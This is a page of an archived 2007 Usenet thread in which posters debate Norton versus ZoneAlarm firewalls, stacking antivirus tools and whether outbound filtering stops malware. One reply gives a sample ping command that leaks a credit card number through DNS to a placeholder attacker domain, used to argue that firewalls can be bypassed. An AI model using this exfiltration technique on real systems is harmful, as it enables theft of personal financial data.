Norton vs Zone Alarm firewalls - Firewalls

This is a discussion on Norton vs Zone Alarm firewalls - Firewalls ; On Tue, 27 Nov 2007 14:24:21 +0100 (CET), Ansgar -59cobalt- Wiechers wrote: > In comp.security.firewalls Kayman wrote: >> On Tue, 27 Nov 2007 06:43:39 GMT, HEMI-Powered wrote: >>> Kayman added these comments in the current discussion du jour >>>> "People ...

+ Reply to Thread
Page 3 of 3 FirstFirst 1 2 3
Results 41 to 51 of 51

Thread: Norton vs Zone Alarm firewalls

  1. Re: Norton vs Zone Alarm firewalls

    On Tue, 27 Nov 2007 14:24:21 +0100 (CET), Ansgar -59cobalt- Wiechers wrote:

    > In comp.security.firewalls Kayman wrote:
    >> On Tue, 27 Nov 2007 06:43:39 GMT, HEMI-Powered wrote:
    >>> Kayman added these comments in the current discussion du jour
    >>>> "People think that putting one AV engine after another is somehow
    >>>> defense in depth. They think that if one engine doesn't catch the
    >>>> worm, the other will catch it," he said. "You haven't decreased your
    >>>> attack surface; you've increased it because every AV engine has
    >>>> bugs"
    >>>
    >>> I don't think anyone thinks that having more than one true AV utility
    >>> running at a time is a good idea. But, what I listed running all the
    >>> time, eTrust Pest Patrol, commercial Zone Alarm, and NAV 2006 are all
    >>> intended to do different things in different ways. And, running
    >>> Ad-Aware and Spy Bot Search & Destroy as separate utilities
    >>> periodically do yet another security-related purpose. So, I see no
    >>> conflicts here.

    >>
    >> Conflict(s) is/are not the issue; The OS may appear working smoothly.
    >> But installing anti-whatever applications has made your OS more
    >> vulnerable to attacks.

    >
    > Not true. Conflicts between two on-access scanners are a very real issue
    > and are indeed the main argument against installing concurring scanners.


    Yes of course! Utilizing more than one (1) real-time anti-virus scanning
    engine most likely will cause conflicts; I didn't mean to suggest
    otherwise. I was trying to emphasise that additional software such as
    on-demand av/a-s and other anti-whatever apps. are not causing noticable
    conflicts per se. Sorry for confusion.

    > Also, installing applications does not necessarily make an OS more
    > vulnerable. The OS only becomes more vulnerable if some application has
    > an exploitable bug. Of course installing additional software does
    > increase the chance of that happening, but it doesn't automagically make
    > the OS (more) vulnerable.
    >
    > For example: you can easily run two or more on-demand virus scanners
    > without a single problem, because they're running as simple userspace
    > applications (and thus won't affect each other), and only run with the
    > privileges of the user initiating the scan.
    >
    > However, that doesn't mean that it'd be okay to install arbitrary AV
    > software, because several of them have issues aside from what I
    > mentioned above.
    >
    > cu
    > 59cobalt


  2. Re: Norton vs Zone Alarm firewalls

    Unknown wrote:
    > "Ansgar -59cobalt- Wiechers" wrote:
    >> In comp.security.firewalls Kayman wrote:
    >>> Conflict(s) is/are not the issue; The OS may appear working
    >>> smoothly. But installing anti-whatever applications has made your OS
    >>> more vulnerable to attacks.

    >>
    >> Not true. Conflicts between two on-access scanners are a very real
    >> issue and are indeed the main argument against installing concurring
    >> scanners. Also, installing applications does not necessarily make an
    >> OS more vulnerable. The OS only becomes more vulnerable if some
    >> application has an exploitable bug. Of course installing additional
    >> software does increase the chance of that happening, but it doesn't
    >> automagically make the OS (more) vulnerable.
    >>
    >> For example: you can easily run two or more on-demand virus scanners
    >> without a single problem, because they're running as simple userspace
    >> applications (and thus won't affect each other), and only run with
    >> the privileges of the user initiating the scan.
    >>
    >> However, that doesn't mean that it'd be okay to install arbitrary AV
    >> software, because several of them have issues aside from what I
    >> mentioned above.

    >
    > I use absolutely no virus programs whatsoever, have never had a virus
    > or malware. Can you tell me why?


    You may want to explain how exactly that is supposed to relate to what I
    wrote.

    cu
    59cobalt
    --
    "If a software developer ever believes a rootkit is a necessary part of
    their architecture they should go back and re-architect their solution."
    --Mark Russinovich

  3. Re: Norton vs Zone Alarm firewalls

    In comp.security.firewalls RalfG wrote:
    > "Gerald Vogt" wrote:
    >> RalfG wrote:
    >>> firewall may have the ability to block -any- application from
    >>> sending email without explicit approval. Monitoring outbound traffic
    >>> also entails

    >>
    >> Still, any application can send email without explicit approval if it
    >> really wants to. That's the point which is usually not mentioned.

    >
    > In your preferred setup nothing prevents emails from being sent. With
    > an appropriate firewall the firewall can block emails from being sent
    > without user intervention.


    The user's mail client is allowed to send mail. %OTHER_PROGRAM% utilizes
    the user's mail client to send mail. How does the firewall prevent that?

    No, trying to intercept IPC and then let the user decide is not an
    option, because that kind of decision is *way* over a normal user's
    head.

    >>> differentiating the legitimate processes from suspicious ones or
    >>> spoofs. All firewalls are not equal, but if the firewall is doing
    >>> the job well it's not enough for a process to pretend to be
    >>> "iexplore.exe" in order to pass the firewall, it has to be
    >>> c:\program files\internet explorer\iexplore.exe, with additional
    >>> identifying information, be it a specific version number, CRC etc.
    >>> etc..

    >>
    >> An what keeps the malware from using the original IE to send out its
    >> data?

    >
    > In your setup nothing, with many firewalls nothing as well, however
    > there are firewalls which do monitor all processes that try to start
    > other processes.


    There's exactly no need at all to do that. Software Restriction Policies
    already allow to define which programs may or may not be executed.

    >>> Viruses aren't smart, they're all constrained to operating within
    >>> specific program parameters. Some are more cleverly written than
    >>> others but the vast majority have already been beaten.

    >>
    >> Yes. But that's all. A single little bit cleverer malware sends out
    >> your credit card number through DNS. Your firewall does not help. It
    >> does not recognize it. You still need more effective means to protect
    >> your data which no security suite can provide.

    >
    > You're basing your argument on a hypothetical malware and deficient AV
    > and firewall apps. Sorry, that strawman logic doesn't work. One of the
    > reasons for monitoring outbound traffic is precisely to stop
    > unrecognized processes from making connections, either to the internet
    > or to other nodes on a LAN.


    Instead of restricting the communication of unrecognized processes you
    want to prevent unrecognized processes from being started in the first
    place. That's what AV software and SRP do.

    > Firewall X might do this better than Firewall Y, Firewall Z might not
    > do it at all. Y may not be as good a firewall as X but it is still
    > better than Z, and even Z is better than nothing at all.


    Wrong, because this neglects the existence of exploitable bugs and
    design flaws in the firewall software as well as the possibility of
    intelligent malware.

    >>> Anyway this thread seems to be missing the point. It's analagous to
    >>> saying that we shouldn't bother using crosswalks or crossing at the
    >>> lights because it is always possible that some idiot driver might
    >>> ignore the signals and run us down anyway. One side (anti-security)
    >>> says avoid the problem by never crossing a street, the other side
    >>> (pro-security) says use due caution and

    >>
    >> No. That is the wrong analogy. Noone ever said you can never cross
    >> the street.
    >>
    >> You say you have to install security firewall, i.e. you have to cross
    >> the street with the security installed, i.e. at the lights. You must
    >> not cross the street at any other place (i.e. without security)
    >> because you will be killed, i.e. it is impossible to cross the
    >> street at any other place except at the lights.

    >
    > I never suggested certainty. The whole computer security issue is
    > about probabilities.


    No. Computer security is about reliability. Which may very well be based
    on probabilities, but only if you have some hard numbers. Which numbers
    are the probabilities you're talking about based on?

    > There is a greater probability of being hit by traffic if you don't
    > use the crosswalks just as there is a greater probability of falling
    > victim to malware if you don't use security software.


    Pointless, unless you are able to quantify that.

    cu
    59cobalt
    --
    "If a software developer ever believes a rootkit is a necessary part of
    their architecture they should go back and re-architect their solution."
    --Mark Russinovich

  4. Re: Norton vs Zone Alarm firewalls

    RalfG wrote:
    > "Gerald Vogt" wrote in message
    > news:ex5$zCVMIHA.1164@TK2MSFTNGP02.phx.gbl...
    >> RalfG wrote:
    >>> It doesn't need to be a virus. I did encounter that one time when
    >>> accessing a web page unexpectedly triggered OE and the firewall blocked
    >>> it. A

    >> Which means again you went to that web page to start with. It was your
    >> action which brought you there.

    >
    > Normal usage of the computer for browsing, yes. Staying off of the internet
    > is almost certainly the best way to avoid trouble but that's just a tad self
    > defeating.


    I'll never understand why many people also jump to the "stay of the
    internet". No one said so. It is your conclusion that it is inevitable
    to come to such "bad" web pages. And that is simply not true. You can
    browse the internet and with still avoid most of those pages.

    >>> firewall may have the ability to block -any- application from sending
    >>> email without explicit approval. Monitoring outbound traffic also entails

    >> Still, any application can send email without explicit approval if it
    >> really wants to. That's the point which is usually not mentioned.

    >
    > In your preferred setup nothing prevents emails from being sent. With an
    > appropriate firewall
    > the firewall can block emails from being sent without user intervention.


    Yes. The firewall may be able to block emails from send with OE without
    user intervention.

    It cannot prevent some malware to put some mails into the outbox which
    is send out the next time the user sends something out.

    And it cannot prevent some malware sending out e-mail or other data
    bypassing the firewall. If you want to get something out you'll get it
    out even with the firewall in place.

    >>> differentiating the legitimate processes from suspicious ones or spoofs.
    >>> All firewalls are not equal, but if the firewall is doing the job well
    >>> it's not enough for a process to pretend to be "iexplore.exe" in order to
    >>> pass the firewall, it has to be c:\program files\internet
    >>> explorer\iexplore.exe, with additional identifying information, be it a
    >>> specific version number, CRC etc. etc..

    >> An what keeps the malware from using the original IE to send out its data?

    >
    > In your setup nothing, with many firewalls nothing as well, however there
    > are firewalls
    > which do monitor all processes that try to start other processes.


    Many people have a browser running at all times. You don't need to start
    a process. You just have to make the other process do what you want.
    That's not so awfully difficult.

    >>> Viruses aren't smart, they're all constrained to operating within
    >>> specific program parameters. Some are more cleverly written than others
    >>> but the vast majority have already been beaten.

    >> Yes. But that's all. A single little bit cleverer malware sends out your
    >> credit card number through DNS. Your firewall does not help. It does not
    >> recognize it. You still need more effective means to protect your data
    >> which no security suite can provide.

    >
    > You're basing your argument on a hypothetical malware and deficient AV and
    > firewall apps. Sorry, that strawman logic doesn't work. One of the reasons
    > for monitoring outbound traffic is precisely to stop unrecognized processes
    > from making connections, either to the internet or to other nodes on a LAN.


    Again. IE, OE, and other installed applications on your computer are not
    unrecognized processes. ping for example is a standard application. You
    can simply enter

    ping VISA12341234123412340108RalfGGG.badguy.example.com

    And here goes your credit card... You'll never notice. At the same time
    you run another process which you let get caught by the firewall to make
    the user think it is all safe and he can continue...

    I don't have to use unrecognized processes to send data.

    And even "unrecognized processes" can trick the firewall.


    > Firewall X might do this better than Firewall Y, Firewall Z might not do it
    > at all. Y may not be as good a firewall as X but it is still better than Z,
    > and even Z is better than nothing at all.


    Good at blocking software you have installed and use to communicate: yes.

    Good at blocking malware effectively: no.

    >> You say you have to install security firewall, i.e. you have to cross the
    >> street with the security installed, i.e. at the lights. You must not cross
    >> the street at any other place (i.e. without security) because you will be
    >> killed, i.e. it is impossible to cross the street at any other place
    >> except at the lights.

    >
    > I never suggested certainty. The whole computer security issue is about
    > probabilities. There is a greater probability of being hit by traffic if you
    > don't use the crosswalks just as there is a greater probability of falling
    > victim to malware if you don't use security software.


    This is just plain wrong. I am far more safe if I open my eyes and make
    sure that it is safe to cross the street then to rely on traffic lights.

    Thus, why would you tell everybody to use the lights and it is
    absolutely essential to use the lights when there is a far more
    effective and safer method?

    >> you from being killed if all you do is to cross the street at the lights
    >> and never looking to the right or left. If you just start to walk when
    >> it's green you'll be eventually killed. There are a lot of nice drivers
    >> who stop at their red light but eventually you'll meet the one who does
    >> not.
    >>
    >> The alternative is not to rely on the lights. Don't trust the lights. The
    >> effective security is to switch on your brain and protect yourself looking
    >> to the left and right and making sure yourself it is safe to cross the
    >> street at this time and at this place. This effectively

    >
    > You just described using due caution.


    Which is far more effective security.

    >> That's the correct analogy if you want to use the "lights". Noone ever
    >> said you cannot cross the street. On the contrary. (I already know how you
    >> will now adjust your analogy but...)

    >
    > There's no need to adjust my analogy. You haven't yet made a compelling
    > argument in favour of your position.. and I doubt that accident statistics
    > will support your contentions either.


    You started that analogy. I did not adjust it. You described it wrong.

    The goal was to cross the street.

    You use security software as aid just like traffic lights are a aid for
    that.

    I say you don't need the lights. You don't need the security software.

    It is useless to discuss your analogy if you want the analogy to be that
    not using security software equals not crossing the street. Because you
    mix the aim with the tool which is supposed to help.

    >>> cross with the lights. I use a firewall mainly to keep
    >>> unauthorised -people- out of my PC, AV and AS software to keep out or
    >>> kill malicious software.

    >> Anything that comes on to your computer first of all got there because of
    >> your action, i.e. your "invitation". But none of the security suites
    >> really deals with this fact nor

    >
    > Blaming the victim?


    Yes. If a person refuses to learn about security. If a person thinks it
    only has to install a software suite to protect your computer. If a
    person thinks with security suite in place everything is done which one
    can possibly do to have security. If someone wants to dig in the dirt
    he'll get dirty. If you are concerned about the security of your
    computer and data you'll learn rules how to keep secure.

    Gerald

  5. Re: Norton vs Zone Alarm firewalls

    Yes Gerald, I know I should be kind of ashamed to belong still to the
    species who use ZA to some extend, but:

    >Why again does it happen to so many people that there
    >networking still does not work correctly after they have uninstalled
    >ZoneAlarm? The stupid uninstaller forgot to remove the proxy setting
    >in the internet settings... Hic. It was just not built to be
    >uninstalled.


    you are right , I can confirm it is so.



  6. Re: Norton vs Zone Alarm firewalls

    >I understand that you are trying to be helpful, but I have to disagree with
    >you on the points that you have to reinstall windows to uninstall security
    >software or that running a windows system without av or pfw is a good idea.


    In fact I am very much surprised how kind they all were to you, how
    decent the discussion went on this time.
    When I placed one time a Q abt ZA, I thought I started WW3!



  7. Re: Norton vs Zone Alarm firewalls

    > My Zone Alarm Pro firewall subscription expires in a few days and I
    > recently bought a Norton Internet Security 2008 package that contains a
    > firewall.
    > I currently have the Norton firewall turned off and just use the Zone
    > Alarm Pro firewall.
    > I don't use the Win XP firewall because I heard that it's not a good idea
    > to have several firewall on at the same time.
    > We get internet through a Belkin pre-N wireless router that is supposed to
    > have some sort of firewall built in and that one is turned on.
    > My computer connects to the router with an ethernet cable and my son's
    > computer uses a Belkin N usb wireless adapter. They both have the same
    > current setup I describe regarding firewalls.
    > Can anyone please advise on whether the Zone Alarm Pro firewall is any
    > better than the Norton firewall in my situation?
    > Should I renew the Zone Alarm Pro subscription or uninstall it when it
    > expires and turn on the Norton firewall?
    > Thanks for any advice.


    Specifically with regard to your question I think an important part of the
    answer is which firewall software you are more comfortable with. By that I
    mean which product's interface and features make the most sense? Firewalls
    have many features which can be often be configured in multiple ways. The
    more you understand the product the more likely you will configure it
    optimally and get the best protection. Zone Alarm is a good choice if you
    want to be involved. On the other hand, some folks prefer security software
    that requires as little user interaction as possible and the Norton products
    are a good choice in that case because by default they handle a lot of the
    decision making. I'm not familiar with the firewall included in NIS 2008 so
    I can't comment specifically on it, but it did get a very good review at
    pcmag.com. Hope this helps.


  8. Re: Norton vs Zone Alarm firewalls

    "Kayman" wrote in message
    news:1vmjr84gxn0np$.tn0yxpzuscii.dlg@40tude.net...
    >
    > It is important that administrators follow the rule of least privilege.


    Definitely.




  9. Re: Norton vs Zone Alarm firewalls

    "Ansgar -59cobalt- Wiechers" wrote in message
    news:fika9uUka3L1@news.in-ulm.de...
    > In comp.security.firewalls RalfG wrote:
    >> "Gerald Vogt" wrote:
    >>> RalfG wrote:

    >>
    >> One of the
    >> reasons for monitoring outbound traffic is precisely to stop
    >> unrecognized processes from making connections, either to the internet
    >> or to other nodes on a LAN.

    >
    > Instead of restricting the communication of unrecognized processes you
    > want to prevent unrecognized processes from being started in the first
    > place. That's what AV software and SRP do.



    I think you are both correct. Doing both makes it more difficult for
    malicious software to work. Doing one without the other can be a
    vulnerability.


    Note: I am sorry that I had to add the other newsgroups back into the list
    of recipients of this, but I am unable to send to just
    comp.security.firewalls.




  10. Re: Norton vs Zone Alarm firewalls

    "Gerald Vogt" wrote in message
    news:eN$4UbhMIHA.4476@TK2MSFTNGP06.phx.gbl...
    >
    > It cannot prevent some malware to put some mails into the outbox which is
    > send out the next time the user sends something out.


    Outlook Express won't send anything without some user involvement. In the
    past, it was possible for unauthorized software to spread themselves in the
    manner you describe but now Microsoft does not allow it. Certainly there is
    potential for sophisticated software to bypass such things, but if it were
    as easy as you say, we would sure hear about it.

    Windows, at least prior to Vista, is surprisingly vulnerable to software
    that is allowed to execute in a system. It is so vulnerable that it is
    nearly impossible to make a system totally safe from software running in a
    system. There are many ways for software to inject a DLL or other code into
    another process. Good antivirus software will catch most of those, and
    detection of injection is a critical way to catch most malicious software
    and that is how antivirus software might also catch many valid utility
    software.

    Regardlous, use of OE in the manner you describe is not as easy as you
    indicate.




  11. Re: Norton vs Zone Alarm firewalls

    On Sun, 25 Nov 2007 16:19:26 -0500, "Poprivet`"
    wrote:



    > "Integrate" means to essentially become a part of.


    Which is exactly what happens.



    >I can't answer that one because I don't have any issues with it. I use
    >ZoneAlarm Pro after using the free version for a long time, and never had
    >issues with it.


    Malware you'd allow to run wouldn't have issues with it either.



    >I simply believe that inconsistancies and misinformation are bad, very bad,
    >in a public place because too many newbies will hook onto the one they like
    >the best and remember that instead of the more accurate assessments.


    Agreed. Now please tell that to vendors of so called "security
    software".



    >Not really. Within minutes, the "noise" of the internet is likely to
    >discover one or more of your open ports and start testing them.


    Now, you're the one spreading misinformation here. This is only true
    prior to XP SP2 unless you turned on the firewall or, even better,
    shut down your network services.

    >One can literally become infected with a virus or spyware within minutes of
    >accessing the internet without some sort of protection in place, especially
    >considering all of the "noise" looking for you are covert in nature and
    >aren't going to announce themselves. You'll find very, very few
    >recommendations to EVER connect to the 'net without some sort of protection
    >installed.


    I had a W2K machine directly connected to the net for years, without
    any "protection" and without any problems, so you are obviously wrong.



    >There's a little hype involved, but if you'd like to see what's happening on
    >your machine and who can see what in and on it, visit grc.com and let them
    >run a few tests on you ports.


    Referring to grc.com does not improve your argument. Quite contrary.

    >In my current configuration, I'm fully "stealthed",


    Stealth is hype and doesn't add anything in terms of security.

    >meaning no one on the 'net can see me in any way.


    meaning you don't have a clue...

    >That's the target to shoot for. It's a free service, and pretty good. There are
    >others also but I like grc.


    And you were the one warning against misinformation...



+ Reply to Thread
Page 3 of 3 FirstFirst 1 2 3